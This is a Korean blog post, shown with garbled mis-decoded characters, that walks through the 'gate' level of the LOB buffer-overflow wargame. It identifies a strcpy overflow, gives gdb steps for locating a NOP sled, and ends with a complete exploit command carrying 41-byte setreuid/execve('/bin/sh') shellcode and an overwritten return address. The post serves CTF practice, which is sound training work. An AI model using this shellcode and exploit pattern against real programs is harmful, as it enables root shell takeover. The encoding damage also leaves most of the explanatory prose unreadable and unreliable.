Wargame/CTF(Capture The Flag)

LOB gate

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 9. 14.
728x90
๋ฐ˜์‘ํ˜•

LOB gate๋กœ ์ ‘์†์„ ํ•˜๋ฉด 

gate์™€ gate๋กœ ์ ‘์†๊ฐ€๋Šฅํ•˜๋‹ค.


์ ‘์†ํ›„ ํ™•์ธ ํ•˜๋ฉด ํŒŒ์ผ์ด 3๊ฐœ์žˆ๋Š” ๊ฒƒ์ด ํ™•์ธ๊ฐ€๋Šฅ ํ•˜๋‹ค 


๋จผ์ € cp ๋ช…๋ น์„ ์ด์šฉํ•˜์—ฌ gremlin์˜ ๊ถŒํ•œ์ด ์—†์–ด gdb ๋„ ๋ชปํ•˜๋Š” ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•˜์ž !

cp๋ช…๋ น์–ด๋Š” ํŒŒ์ผ์„ ๋ณต์‚ฌํ•˜๋Š” ๋ช…๋ น์–ด์ด๋‹ค. 

ํŒŒ์ผ์„ ๋ณต์‚ฌํ•˜๊ณ  gremlin.c ๋ฅผ ์—ด์–ด๋ณด๋ฉด 

strcpy์—์„œ ๋ฌธ์ œ๊ฐ€ ๋ฐœ์ƒํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ๋‹ค.

ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ๊ฐ ํ•ด๋ณด๋ฉด ์ผ๋‹จ buffer 260(256+sfp)+shellcode+ret์ฃผ์†Œ(buffer์ฃผ์†Œ)๋ฅผ ๋„ฃ์–ด์•ผํ•œ๋‹ค.


gdb๋กœ ํ™•์ธ์„ ํ•ด๋ณด๋ฉด strcpy๋‹ค์Œ์—์„œ ์ผ์–ด๋‚˜๋‹ˆ 



b *main+59์— ๋ธŒ๋ ˆ์ดํฌ ํฌ์ธํŠธ๋ฅผ ๊ฑธ๊ณ  

r $(python -c 'print "\x90"*200(์ž„์˜์˜ ๊ฐ’)')์„ ๋„ฃ๊ณ 


x/100x $esp ๋กœ esp๊ฐ’์„ ํ™•์ธ ํ•˜๋ฉด 0x90909090์‹œ์ž‘ํ•˜๋Š” ๋ถ€๋ถ„์„ ์ฐพ์„ ์ˆ˜์žˆ๋‹ค

๊ทธ๊ณณ์—์„œ ์ ๋‹นํ•œ ์œ„์น˜๋ฅผ ์žก๊ณ  attack!!



q ๋ฅผ ์ด์šฉํ•ด gdb ์—์„œ ๋‚˜์˜จํ›„ ./gremlin $(python -c 'print "\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80(41byte shellcode)+"\x90"*19+"์ฃผ์†Œ๊ฐ’"')=> 260+์ฃผ์†Œ ๊ฐ’(200+41+19+์ฃผ์†Œ๊ฐ’(4byte) ์™„์„ฑ

728x90
๋ฐ˜์‘ํ˜•

'Wargame > CTF(Capture The Flag)' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

LOB goblin  (0) 2015.09.15
LOB gremlin  (0) 2015.09.14
Challenge 36 - Back Up  (0) 2015.09.05
Chellenge 39 - ???  (0) 2015.09.05
Challenge 27 - SQL Injection  (0) 2015.09.05

๋Œ“๊ธ€